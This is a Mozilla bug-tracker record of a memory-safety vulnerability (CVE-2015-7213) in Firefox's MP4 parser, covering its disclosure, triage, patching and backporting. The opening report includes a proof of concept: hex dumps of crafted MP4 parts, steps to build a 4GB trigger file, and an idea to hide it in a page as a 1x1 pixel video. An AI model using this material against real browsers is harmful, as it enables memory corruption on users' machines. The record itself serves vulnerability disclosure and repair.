Closed
Bug 1206211
(CVE-2015-7213)
Opened 9 years ago
Closed 9 years ago
Overflow in MPEG4Extractor::readMetaData causes memory-safety bug
Categories
(Core :: Audio/Video: Playback, defect)
Tracking
()
VERIFIED
FIXED
mozilla44
People
(Reporter: q1, Assigned: jya)
References
Details
(Keywords: csectype-intoverflow, reporter-external, sec-high, Whiteboard: [adv-main43+][adv-esr38.5+])
Attachments
(8 files)
160 bytes,
application/octet-stream
|
Details | |
3.39 KB,
application/octet-stream
|
Details | |
96 bytes,
application/octet-stream
|
Details | |
593.25 KB,
application/x-7z-compressed
|
Details | |
1.26 KB,
patch
|
ajones
:
review+
lizzard
:
approval-mozilla-beta+
abillings
:
sec-approval+
|
Details | Diff | Splinter Review |
1.18 KB,
patch
|
ajones
:
review+
lizzard
:
approval-mozilla-beta+
|
Details | Diff | Splinter Review |
1.27 KB,
patch
|
mozbugz
:
review+
Sylvestre
:
approval-mozilla-esr38+
|
Details | Diff | Splinter Review |
1.20 KB,
patch
|
mozbugz
:
review+
Sylvestre
:
approval-mozilla-esr38+
|
Details | Diff | Splinter Review |
MPEG4Extractor::readMetaData (media\libstagefright\frameworks\av\media\libstagefright\MPEG4Extractor.cpp) will experience an integer overflow with certain MP4 files. This causes the function to allocate a erroneously-small buffer, which it then overruns. The data causing the overrun comes directly from the MP4 file and is, thus, under an attacker's control. This bug currently is exploitable only on x64 versions of FF, but it might be possible to exploit it on x86 versions as well. Details ------- The bug is in lines 511-514: 511: int psshsize = 0; 512: for (size_t i = 0; i < mPssh.size(); i++) { 513: psshsize += 20 + mPssh[i].datalen; 514: } 515: if (psshsize) { 516: char *buf = (char*)malloc(psshsize); 517: char *ptr = buf; 518: for (size_t i = 0; i < mPssh.size(); i++) { 519: memcpy(ptr, mPssh[i].uuid, 20); // uuid + length 520: memcpy(ptr + 20, mPssh[i].data, mPssh[i].datalen); 521: ptr += (20 + mPssh[i].datalen); 522: } 523: mFileMetaData->setData(kKeyPssh, 'pssh', buf, psshsize); 524: free(buf); 525: } which don't check for overflow of |psshsize|. Thus, a file containing pssh boxes totalling > 4GB cause line 513 to overflow. Line 516 then allocates an erroneously-small buffer, which lines 518-522 then overrun with data extracted directly from the MP4 file. This bug is still present in today's trunk: http://hg.mozilla.org/mozilla-central/file/37c7812ce0e6/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp . The bug is easy to invoke. Using a binary editor, create poc_header.bin with the following data: 000: 00 00 00 1c 66 74 79 70 6d 70 34 32 00 00 00 00 010: 6d 70 34 32 69 73 6f 6d 61 76 63 31 00 00 00 84 020: 66 72 65 65 00 00 00 00 00 00 00 00 00 00 00 00 030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Then create poc_trailer.bin with this data: 000: 00 00 0d 83 6d 6f 6f 76 00 00 00 6c 6d 76 68 64 moov lmvhd 010: 00 00 00 00 c7 ca ee a7 c7 ca ee a8 00 01 5f 90 _ 020: 00 07 a5 80 00 01 00 00 01 00 00 00 00 00 00 00 030: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 040: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 050: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 @ 060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 070: 00 00 00 03 00 00 00 18 69 6f 64 73 00 00 00 00 iods 080: 10 80 80 80 07 00 4f ff ff 0f 7f ff 00 00 06 0a O 090: 74 72 61 6b 00 00 00 5c 74 6b 68 64 00 00 00 01 trak \tkhd 0a0: c7 ca ee a7 c7 ca ee a8 00 00 00 01 00 00 00 00 0b0: 00 07 99 50 00 00 00 00 00 00 00 00 00 00 00 00 P 0c0: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0d0: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0e0: 00 00 00 00 40 00 00 00 02 30 00 00 01 40 00 00 @ 0 @ 0f0: 00 00 05 a6 6d 64 69 61 00 00 00 20 6d 64 68 64 mdia mdhd 100: 00 00 00 00 c7 ca ee a7 c7 ca ee a8 00 01 5f 90 _ 110: 00 07 99 50 55 c4 00 00 00 00 00 21 68 64 6c 72 PU !hdlr 120: 00 00 00 00 00 00 00 00 76 69 64 65 00 00 00 00 vide 130: 00 00 00 00 00 00 00 00 00 00 00 05 5d 6d 69 6e ]min 140: 66 00 00 00 14 76 6d 68 64 00 00 00 01 00 00 00 f vmhd 150: 00 00 00 00 00 00 00 00 24 64 69 6e 66 00 00 00 $dinf 160: 1c 64 72 65 66 00 00 00 00 00 00 00 01 00 00 00 dref 170: 0c 75 72 6c 20 00 00 00 01 00 00 05 1d 73 74 62 url stb 180: 6c 00 00 00 ab 73 74 73 64 00 00 00 00 00 00 00 l stsd 190: 01 00 00 00 9b 61 76 63 31 00 00 00 00 00 00 00 avc1 1a0: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b0: 00 02 30 01 40 00 48 00 00 00 48 00 00 00 00 00 0 @ H H 1c0: 00 00 01 0e 4a 56 54 2f 41 56 43 20 43 6f 64 69 JVT/AVC Codi 1d0: 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ng 1e0: 00 00 00 00 18 ff ff 00 00 00 33 61 76 63 43 01 3avcC 1f0: 42 c0 1e ff e1 00 1b 67 42 c0 1e 9e 21 81 18 53 B gB ! S 200: 4d 40 40 40 50 00 00 03 00 10 00 00 03 03 c8 f1 M@@@P 210: 62 ee 01 00 05 68 ce 06 cb 20 00 00 00 12 63 6f b h co 220: 6c 72 6e 63 6c 63 00 01 00 01 00 01 00 00 00 18 lrnclc 230: 73 74 74 73 00 00 00 00 00 00 00 01 00 00 00 a6 stts 240: 00 00 0b b8 00 00 02 ac 73 74 73 7a 00 00 00 00 stsz 250: 00 00 00 00 00 00 00 a6 00 00 56 27 00 00 0b 20 V' 260: 00 00 05 bc 00 00 05 e2 00 00 05 c1 00 00 04 37 7 270: 00 00 04 07 00 00 03 b6 00 00 06 45 00 00 03 73 E s 280: 00 00 05 12 00 00 03 26 00 00 02 e9 00 00 03 7b & { 290: 00 00 03 4a 00 00 03 6b 00 00 02 b6 00 00 03 4c J k L 2a0: 00 00 02 7a 00 00 02 c7 00 00 02 2e 00 00 03 16 z . 2b0: 00 00 02 26 00 00 02 7f 00 00 01 ec 00 00 01 ea & 2c0: 00 00 01 f5 00 00 01 eb 00 00 01 fa 00 00 01 e7 2d0: 00 00 01 fc 00 00 01 dd 00 00 01 c6 00 00 01 ae 2e0: 00 00 01 c8 00 00 01 b9 00 00 01 90 00 00 01 93 2f0: 00 00 01 8c 00 00 01 da 00 00 01 c2 00 00 05 d0 300: 00 00 07 b8 00 00 06 7a 00 00 09 a9 00 00 0a 2c z , 310: 00 00 0a 7c 00 00 0c b3 00 00 09 8c 00 00 09 52 | R 320: 00 00 0c 04 00 00 0d c1 00 00 0f 74 00 00 10 48 t H 330: 00 00 11 06 00 00 10 61 00 00 0c 63 00 00 0c 31 a c 1 340: 00 00 0b 42 00 00 0c 0d 00 00 0f 32 00 00 0a 7b B 2 { 350: 00 00 0d 0f 00 00 0a e0 00 00 0a 0e 00 00 0b 6b k 360: 00 00 08 74 00 00 0c 36 00 00 09 e6 00 00 06 8d t 6 370: 00 00 04 f8 00 00 07 8a 00 00 07 c1 00 00 09 f3 380: 00 00 07 c7 00 00 0a cb 00 00 0a d2 00 00 0b 74 t 390: 00 00 0c 28 00 00 0a 9a 00 00 0c 60 00 00 0d 6d ( ` m 3a0: 00 00 0c 3e 00 00 0f fc 00 00 0e 82 00 00 0b 79 > y 3b0: 00 00 0d e4 00 00 0d 24 00 00 0a 17 00 00 11 aa $ 3c0: 00 00 12 65 00 00 0d 7b 00 00 12 a0 00 00 13 d8 e { 3d0: 00 00 11 49 00 00 0e 59 00 00 10 15 00 00 16 81 I Y 3e0: 00 00 09 b4 00 00 06 eb 00 00 05 ef 00 00 05 8a 3f0: 00 00 03 d7 00 00 04 0d 00 00 03 bb 00 00 04 6b k 400: 00 00 03 40 00 00 03 30 00 00 02 de 00 00 03 ae @ 0 410: 00 00 05 cf 00 00 04 6c 00 00 05 69 00 00 05 00 l i 420: 00 00 06 a1 00 00 03 35 00 00 04 1a 00 00 03 fa 5 430: 00 00 06 3d 00 00 05 d6 00 00 04 68 00 00 02 d6 = h 440: 00 00 04 b5 00 00 02 d9 00 00 02 7f 00 00 02 4d M 450: 00 00 02 7d 00 00 03 8c 00 00 02 06 00 00 02 01 } 460: 00 00 07 7f 00 00 05 ef 00 00 05 b8 00 00 04 0a 470: 00 00 02 99 00 00 03 1d 00 00 07 c5 00 00 05 ac 480: 00 00 04 78 00 00 08 71 00 00 08 99 00 00 08 e9 x q 490: 00 00 08 99 00 00 05 73 00 00 07 c7 00 00 08 3d s = 4a0: 00 00 0b 59 00 00 0a 36 00 00 06 ba 00 00 05 f9 Y 6 4b0: 00 00 07 2e 00 00 06 eb 00 00 04 c6 00 00 04 ba . 4c0: 00 00 05 66 00 00 04 31 00 00 06 8a 00 00 06 cf f 1 4d0: 00 00 06 fe 00 00 04 97 00 00 02 43 00 00 03 e2 C 4e0: 00 00 04 06 00 00 02 e6 00 00 02 6b 00 00 02 75 k u 4f0: 00 00 00 28 73 74 73 63 00 00 00 00 00 00 00 02 (stsc 500: 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 2a * 510: 00 00 00 02 00 00 00 01 00 00 00 b8 73 74 63 6f stco 520: 00 00 00 00 00 00 00 2a 00 00 00 a8 00 00 73 e6 * s 530: 00 00 8b f4 00 00 a4 08 00 00 b7 64 00 00 c8 a5 d 540: 00 00 d7 d8 00 00 e4 a5 00 00 ec 5f 00 00 f8 5f _ _ 550: 00 01 04 41 00 01 1f c3 00 01 51 85 00 01 84 7e A Q ~ 560: 00 01 cc a6 00 02 03 c0 00 02 3c 52 00 02 66 75 <R fu 570: 00 02 8a 1c 00 02 b4 a6 00 02 e7 66 00 03 23 01 f # 580: 00 03 5d ac 00 03 9e 97 00 03 ea 64 00 04 26 0a ] d & 590: 00 04 3e 69 00 04 4c ff 00 04 63 d9 00 04 7e 43 >i L c ~C 5a0: 00 04 98 9b 00 04 ad a9 00 04 be f7 00 04 d7 94 5b0: 00 04 ed 6c 00 05 0e 3b 00 05 2d c9 00 05 59 f0 l ; - Y 5c0: 00 05 7b 82 00 05 95 2b 00 05 b3 da 00 05 c6 67 { + g 5d0: 00 00 00 14 73 74 73 73 00 00 00 00 00 00 00 01 stss 5e0: 00 00 00 01 00 00 00 b2 73 64 74 70 00 00 00 00 sdtp 5f0: 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDD 600: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 610: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 620: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 630: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 640: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 650: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 660: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 670: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 680: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 690: 44 44 44 44 44 44 00 00 06 7e 74 72 61 6b 00 00 DDDDDD ~trak 6a0: 00 5c 74 6b 68 64 00 00 00 03 c7 ca ee a7 c7 ca \tkhd 6b0: ee a8 00 00 00 02 00 00 00 00 00 07 a5 80 00 00 6c0: 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 01 6d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 6e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 @ 6f0: 00 00 00 00 00 00 00 00 00 00 00 00 06 04 6d 64 md 700: 69 61 00 00 00 20 6d 64 68 64 00 00 00 00 c7 ca ia mdhd 710: ee a7 c7 ca ee a8 00 00 bb 80 00 04 14 00 15 c7 720: 00 00 00 00 00 21 68 64 6c 72 00 00 00 00 00 00 !hdlr 730: 00 00 73 6f 75 6e 00 00 00 00 00 00 00 00 00 00 soun 740: 00 00 00 00 00 05 bb 6d 69 6e 66 00 00 00 10 73 minf s 750: 6d 68 64 00 00 00 00 00 00 00 00 00 00 00 24 64 mhd $d 760: 69 6e 66 00 00 00 1c 64 72 65 66 00 00 00 00 00 inf dref 770: 00 00 01 00 00 00 0c 75 72 6c 20 00 00 00 01 00 url 780: 00 05 7f 73 74 62 6c 00 00 00 67 73 74 73 64 00 stbl gstsd 790: 00 00 00 00 00 00 01 00 00 00 57 6d 70 34 61 00 Wmp4a 7a0: 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 7b0: 01 00 10 00 00 00 00 bb 80 00 00 00 00 00 33 65 3e 7c0: 73 64 73 00 00 00 00 03 80 80 80 22 00 00 00 04 sds " 7d0: 80 80 80 14 40 15 00 01 18 00 01 65 f0 00 01 44 @ e D 7e0: 6b 05 80 80 80 02 11 88 06 80 80 80 01 02 00 00 k 7f0: 00 18 73 74 74 73 00 00 00 00 00 00 00 01 00 00 stts 800: 01 05 00 00 04 00 00 00 04 28 73 74 73 7a 00 00 (stsz 810: 00 00 00 00 00 00 00 00 01 05 00 00 00 f7 00 00 820: 00 db 00 00 00 e1 00 00 00 e5 00 00 00 e9 00 00 830: 00 e8 00 00 00 f0 00 00 00 f1 00 00 00 ef 00 00 840: 00 d8 00 00 00 e6 00 00 00 e7 00 00 00 e9 00 00 850: 00 eb 00 00 00 ea 00 00 00 e8 00 00 00 e1 00 00 860: 00 e7 00 00 00 d7 00 00 00 da 00 00 00 d9 00 00 870: 00 db 00 00 00 e9 00 00 00 ee 00 00 00 e5 00 00 880: 00 e1 00 00 00 e6 00 00 00 e5 00 00 00 d8 00 00 890: 00 dd 00 00 00 dd 00 00 00 d5 00 00 00 ea 00 00 8a0: 00 dd 00 00 00 d0 00 00 00 d6 00 00 00 e9 00 00 8b0: 00 bc 00 00 00 ab 00 00 00 b3 00 00 00 b5 00 00 8c0: 00 bc 00 00 00 ce 00 00 00 b4 00 00 00 b6 00 00 8d0: 00 b3 00 00 00 b6 00 00 00 b7 00 00 00 bf 00 00 8e0: 00 b7 00 00 00 cd 00 00 00 c1 00 00 00 ba 00 00 8f0: 00 a7 00 00 00 b4 00 00 00 b1 00 00 00 be 00 00 900: 00 d0 00 00 00 ba 00 00 00 bc 00 00 00 c4 00 00 910: 00 c6 00 00 00 cb 00 00 00 c4 00 00 00 c3 00 00 920: 00 c8 00 00 00 d2 00 00 00 d2 00 00 00 d6 00 00 930: 00 f5 00 00 00 fa 00 00 00 f6 00 00 01 02 00 00 940: 00 fc 00 00 00 fc 00 00 00 ee 00 00 00 e6 00 00 950: 00 ea 00 00 00 ea 00 00 00 e8 00 00 00 de 00 00 960: 00 df 00 00 00 e7 00 00 00 f6 00 00 00 ff 00 00 970: 01 03 00 00 00 f6 00 00 01 08 00 00 01 03 00 00 980: 00 fd 00 00 01 05 00 00 01 02 00 00 01 00 00 00 990: 01 14 00 00 01 18 00 00 00 fd 00 00 00 fb 00 00 9a0: 01 11 00 00 01 05 00 00 01 05 00 00 01 0a 00 00 9b0: 01 01 00 00 00 f3 00 00 00 f7 00 00 00 f7 00 00 9c0: 01 01 00 00 01 02 00 00 00 f8 00 00 00 f8 00 00 9d0: 00 ef 00 00 00 ed 00 00 00 e3 00 00 00 ec 00 00 9e0: 00 e2 00 00 00 e8 00 00 00 dc 00 00 00 e0 00 00 9f0: 00 f3 00 00 00 df 00 00 00 e1 00 00 00 cf 00 00 a00: 00 ce 00 00 00 d8 00 00 00 ce 00 00 00 c7 00 00 a10: 00 cd 00 00 00 b7 00 00 00 af 00 00 00 c8 00 00 a20: 00 d7 00 00 00 e5 00 00 00 e4 00 00 00 c6 00 00 a30: 00 d1 00 00 00 d5 00 00 00 e5 00 00 00 d8 00 00 a40: 00 c8 00 00 00 be 00 00 00 bf 00 00 00 cb 00 00 a50: 00 d2 00 00 00 c8 00 00 00 ca 00 00 00 b1 00 00 a60: 00 a3 00 00 00 c7 00 00 00 dc 00 00 00 d9 00 00 a70: 00 dd 00 00 00 d1 00 00 00 d2 00 00 00 c2 00 00 a80: 00 bc 00 00 00 b1 00 00 00 9b 00 00 00 89 00 00 a90: 00 a2 00 00 00 9f 00 00 00 b5 00 00 00 a6 00 00 aa0: 00 b2 00 00 00 b5 00 00 00 ae 00 00 00 b4 00 00 ab0: 00 b0 00 00 00 c6 00 00 00 c3 00 00 00 d5 00 00 ac0: 00 e4 00 00 00 f6 00 00 00 d6 00 00 00 db 00 00 ad0: 00 cc 00 00 00 e7 00 00 00 f9 00 00 00 cb 00 00 ae0: 00 d8 00 00 00 d6 00 00 00 e4 00 00 00 f1 00 00 af0: 00 e4 00 00 00 e6 00 00 00 df 00 00 00 ee 00 00 b00: 00 d7 00 00 00 c7 00 00 00 e7 00 00 00 f9 00 00 b10: 00 ed 00 00 00 cf 00 00 00 f1 00 00 00 e6 00 00 b20: 00 dc 00 00 00 e4 00 00 00 ef 00 00 00 e5 00 00 b30: 00 f1 00 00 00 e3 00 00 00 ec 00 00 00 ec 00 00 b40: 00 f3 00 00 00 f5 00 00 00 fd 00 00 01 0b 00 00 b50: 01 10 00 00 01 11 00 00 01 03 00 00 01 01 00 00 b60: 00 fb 00 00 00 fa 00 00 00 e7 00 00 00 e5 00 00 b70: 00 f0 00 00 00 d2 00 00 00 e5 00 00 00 f3 00 00 b80: 00 f1 00 00 00 f2 00 00 00 ff 00 00 00 f7 00 00 b90: 00 ee 00 00 00 d5 00 00 00 d9 00 00 00 ea 00 00 ba0: 00 e3 00 00 00 df 00 00 00 f7 00 00 00 ff 00 00 bb0: 00 f8 00 00 00 fa 00 00 00 fd 00 00 00 f7 00 00 bc0: 00 f9 00 00 00 fb 00 00 00 f8 00 00 00 f6 00 00 bd0: 00 f0 00 00 00 fe 00 00 01 02 00 00 00 e9 00 00 be0: 00 ec 00 00 00 ec 00 00 00 e7 00 00 00 ea 00 00 bf0: 00 de 00 00 00 e2 00 00 00 c9 00 00 00 d4 00 00 c00: 00 d4 00 00 00 c7 00 00 00 c9 00 00 00 c8 00 00 c10: 00 c1 00 00 00 c0 00 00 00 bd 00 00 00 de 00 00 c20: 00 cb 00 00 00 cd 00 00 00 d4 00 00 00 6d 00 00 m c30: 00 28 73 74 73 63 00 00 00 00 00 00 00 02 00 00 (stsc c40: 00 01 00 00 00 07 00 00 00 01 00 00 00 26 00 00 & c50: 00 02 00 00 00 01 00 00 00 a8 73 74 63 6f 00 00 stco c60: 00 00 00 00 00 26 00 00 6d 8d 00 00 85 9b 00 00 & m c70: 9d e4 00 00 b1 21 00 00 c2 a7 00 00 d2 8e 00 00 ! c80: df 8e 00 00 f3 54 00 00 fe e8 00 01 1a 05 00 01 T c90: 4a c7 00 01 7e 28 00 01 c5 a1 00 01 fc 89 00 02 J ~( ca0: 35 5c 00 02 83 6a 00 02 ae 62 00 02 e1 ae 00 03 5\ j b cb0: 1d 6d 00 03 58 04 00 03 99 4d 00 03 e4 b1 00 04 m X M cc0: 21 99 00 04 39 67 00 04 5d c6 00 04 78 18 00 04 ! 9g ] x cd0: 92 6a 00 04 a7 67 00 04 b8 7e 00 04 d0 6c 00 04 j g ~ l ce0: e7 0c 00 05 07 c6 00 05 53 5c 00 05 74 bc 00 05 S\ t cf0: 8e 99 00 05 ae 19 00 05 c0 eb 00 05 cb 47 00 00 G d00: 00 16 75 64 74 61 00 00 00 0e 6e 61 6d 65 53 74 udta nameSt d10: 65 72 65 6f 00 00 00 6f 75 64 74 61 00 00 00 67 ereo oudta g d20: 6d 65 74 61 00 00 00 00 00 00 00 21 68 64 6c 72 meta !hdlr d30: 00 00 00 00 00 00 00 00 6d 64 69 72 00 00 00 00 mdir d40: 00 00 00 00 00 00 00 00 00 00 00 00 3a 69 6c 73 :ils d50: 74 00 00 00 32 a9 74 6f 6f 00 00 00 2a 64 61 74 t 2 too *dat d60: 61 00 00 00 01 00 00 00 00 62 6c 61 68 62 6c 61 a blahbla d70: 68 62 20 30 2e 39 2e 34 20 32 32 32 32 31 31 32 hb 0.9.4 2222112 d80: 33 30 30 00 00 00 08 66 72 65 65 Then create poc_body.bin with these contents: 000: 01 00 00 00 70 73 73 68 00 00 00 04 ee ee ee ee pssh 010: ee ee ee ee ee ee ee ee ee ee ee ee 00 00 00 00 020: 50 75 74 20 79 6f 75 72 20 61 74 74 61 63 6b 20 Put your attack 030: 63 6f 64 65 20 61 6e 64 20 64 61 74 61 20 68 65 code and data he 040: 72 65 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e re.............. 050: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ---------------- Set the length of poc_body.bin to 0x01000000. It doesn't matter what bytes 0x20-0xffffff contain. Next, repeatedly double poc_body.bin until it's exactly 0x100000000 bytes long (4GB). Then copy poc_header.bin+poc_body.bin+poc_trailer.bin into poc_test.mp4 , Start FF Win64 and attach a debugger, setting a BP on line 511. Load poc_test.mp4 and wait for the BP to fire, then step the code to see the overflow and subsequent overrun.
The file takes ~30 sec to load. It could be embedded into an attack page as a 1x1 pixel video so users wouldn't notice it loading.
Updated•9 years ago
|
Flags: needinfo?(jyavenard)
Updated•9 years ago
|
Keywords: csectype-intoverflow
Comment 2•9 years ago
|
||
Could you please attach the test file to make it easier to confirm? Thanks.
Flags: needinfo?(q1)
(In reply to Andrew McCreight [:mccr8] from comment #2) > Could you please attach the test file to make it easier to confirm? Thanks. OK. You'll need to edit the poc_body.bin file, extend it, and so forth as described at the end of comment 0. Otherwise it'd be too large to upload. I'll upload the binary files momentarily.
Flags: needinfo?(q1)
Attachment #8664340 -
Attachment filename: poc_lsf_trailer_1.bin → poc_trailer.bin
Attachment #8664336 -
Attachment filename: poc_lsf_hdr_1.bin → poc_header.bin
Attachment #8664342 -
Attachment filename: poc_lsf_pssh_2.bin → poc_body.bin
Comment 8•9 years ago
|
||
(In reply to q1 from comment #3) > (In reply to Andrew McCreight [:mccr8] from comment #2) > > Could you please attach the test file to make it easier to confirm? Thanks. > > OK. You'll need to edit the poc_body.bin file, extend it, and so forth as > described at the end of comment 0. Otherwise it'd be too large to upload. > I'll upload the binary files momentarily. The described test case should compress very well with say xz or lzma if that body is just the same repeated byte. Can you please attach a ready to run test that has been compressed? Thanks.
Comment 10•9 years ago
|
||
(In reply to q1 from comment #9) > Created attachment 8664449 [details] > poc.7z -- unzip with 7z into ready-to-use POC Thanks! I tried to reproduce the issue but hit another I came across while fuzzing a couple weeks ago. I have log the other issue. In the mean time any back traces or ASan logs that you managed to capture would also be nice to have.
Reporter | ||
Comment 11•9 years ago
|
||
(In reply to Tyson Smith [:tsmith] from comment #10) > (In reply to q1 from comment #9) > > Created attachment 8664449 [details] > > poc.7z -- unzip with 7z into ready-to-use POC > > Thanks! I tried to reproduce the issue but hit another I came across while > fuzzing a couple weeks ago. I have log the other issue. In the mean time any > back traces or ASan logs that you managed to capture would also be nice to > have. I found this via code inspection, then formulated the POC. I have tested it under FF 40.0 debug Win64, which is my build with a few trivial unrelated mods. It also crashes 40.0b8 Win64 downloaded directly from ftp.mozilla.org, and if you examine it in the debugger, the crash was clearly caused by memory getting overwritten with the POC's test pattern.
Updated•9 years ago
|
Flags: sec-bounty?
Assignee | ||
Updated•9 years ago
|
Flags: needinfo?(jyavenard)
Assignee | ||
Comment 12•9 years ago
|
||
git bz lost my comment will provide it again later.
Attachment #8665247 -
Flags: review?(ajones)
Assignee | ||
Comment 13•9 years ago
|
||
Attachment #8665248 -
Flags: review?(ajones)
Assignee | ||
Comment 14•9 years ago
|
||
So what I was saying (though will do in a shorter version) While I could see how we could think it would happen theoretically, it can no longer happen following bug 1196398 (which is in 41 onward). We only ever parse the ftyp and moov atoms ; anything in between is ignored. And as such, with this POC.mp4 you'll find that mPssh is an empty array. We no longer support encrypted MP4 outside fragmented mp4 and MSE ; as such we don't attempt to parse pssh atoms ; we use the MoofParser for this which doesn't have this vulnerability. Now you could attempt to craft a mp4 where those pssh would be within the moov atom; but for this to work, you would need the moov atom to have a size > 2GB which isn't possible and would cause a decoding error. We could make the moov atom the last atom and make it with a size of 0 (which normally means: read to the end). However, stagefright doesn't support those and will return also an error as it will error if the atom size is below 8. As such, this vulnerability doesn't apply in 41 and later.
Updated•9 years ago
|
Attachment #8665247 -
Flags: review?(ajones) → review+
Updated•9 years ago
|
Attachment #8665248 -
Flags: review?(ajones) → review+
Assignee | ||
Comment 15•9 years ago
|
||
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. [Security approval request comment] How easily could an exploit be constructed based on the patch? I don't believe they can in 41 and later with this POC. Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? it's fairly generic; do mention Which older supported branches are affected by this flaw? 40 and earlier. esr38 is affected. If not all supported branches, which bug introduced the flaw? the stagefright one, over 1.5 years ago. Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? Patch should apply on 38. How likely is this patch to cause regressions; how much testing does it need? none ; we've applied the same logic elsewhere (limiting size to 2GiB)
Attachment #8665247 -
Flags: sec-approval?
Assignee | ||
Updated•9 years ago
|
Assignee: nobody → jyavenard
Assignee | ||
Comment 16•9 years ago
|
||
!@#$@#$!~@#$ I pushed another patch in my queue, not realising that this one was in it, and it got pushed :( https://hg.mozilla.org/integration/mozilla-inbound/rev/708cf76b6cb4 https://hg.mozilla.org/integration/mozilla-inbound/rev/680e1f669ea5 :(
Comment 17•9 years ago
|
||
(In reply to Jean-Yves Avenard [:jya] from comment #16) > !@#$@#$!~@#$ I pushed another patch in my queue, not realising that this one > was in it, and it got pushed :( > > https://hg.mozilla.org/integration/mozilla-inbound/rev/708cf76b6cb4 > https://hg.mozilla.org/integration/mozilla-inbound/rev/680e1f669ea5 > > :( per talking to dveditz on irc we let this check-in stay and not so far backing this out
Reporter | ||
Comment 18•9 years ago
|
||
(In reply to Jean-Yves Avenard [:jya] from comment #14) > So what I was saying (though will do in a shorter version) > > While I could see how we could think it would happen theoretically, it can > no longer happen following bug 1196398 (which is in 41 onward). > We only ever parse the ftyp and moov atoms ; anything in between is ignored. > And as such, with this POC.mp4 you'll find that mPssh is an empty array. > > We no longer support encrypted MP4 outside fragmented mp4 and MSE ; as such > we don't attempt to parse pssh atoms ; we use the MoofParser for this which > doesn't have this vulnerability. > > Now you could attempt to craft a mp4 where those pssh would be within the > moov atom; but for this to work, you would need the moov atom to have a size > > 2GB which isn't possible and would cause a decoding error. > > We could make the moov atom the last atom and make it with a size of 0 > (which normally means: read to the end). However, stagefright doesn't > support those and will return also an error as it will error if the atom > size is below 8. > > As such, this vulnerability doesn't apply in 41 and later. That's the conclusion I came to after trying the POC on 41 yesterday.
Comment 19•9 years ago
|
||
We need a security rating on this issue. This looks like an exploitable crash from an overflow. Is that right? Am I correct in reading that we are *only* wanting this bug on ESR38, despite screw ups of checkins? :-)
Flags: needinfo?(jyavenard)
Updated•9 years ago
|
Group: core-security → media-core-security
https://hg.mozilla.org/mozilla-central/rev/680e1f669ea5 https://hg.mozilla.org/mozilla-central/rev/708cf76b6cb4
Status: NEW → RESOLVED
Closed: 9 years ago
status-firefox44:
--- → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla44
Assignee | ||
Comment 21•9 years ago
|
||
(In reply to Al Billings [:abillings] from comment #19) > We need a security rating on this issue. This looks like an exploitable > crash from an overflow. Is that right? Hard to tell really. Just as severe as all the other stagefright overflow. Probably more so because it's very easily to control what is going to be copied as the code simply replicate the content of the mp4 atoms. > > Am I correct in reading that we are *only* wanting this bug on ESR38, > despite screw ups of checkins? :-) Yes, only for ESR38
Flags: needinfo?(jyavenard)
Comment 22•9 years ago
|
||
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. sec-approval+. Can you nominate for ESR38?
Attachment #8665247 -
Flags: sec-approval? → sec-approval+
Updated•9 years ago
|
Group: media-core-security → core-security-release
Reporter | ||
Comment 23•9 years ago
|
||
Since libstagefright is a Google lib (I think!), I have reported this bug also at https://code.google.com/p/chromium/issues/detail?id=539372 .
Comment 24•9 years ago
|
||
This was supposed to have landed in the ESR release, let's not miss this one too.
status-firefox-esr38:
--- → affected
tracking-firefox-esr38:
--- → 43+
Comment 25•9 years ago
|
||
ni? just to make sure releng is tracking this bug
Flags: needinfo?(rkothari)
Just a rebase for ESR-38.
Attachment #8694544 -
Flags: review+
Just a rebase for ESR-38.
Attachment #8694545 -
Flags: review+
As this bug is needed before bug 1216748, I've checked the patches for landing on Beta-43 (the original patches just work) and ESR-38 (new patches submitted above). Note that they are already in Aurora-44, so no need to uplift them there.
Blocks: CVE-2015-7222
Gerald, could you please nominate the ESR38 patch for uplift?
Flags: needinfo?(rkothari) → needinfo?(gsquelart)
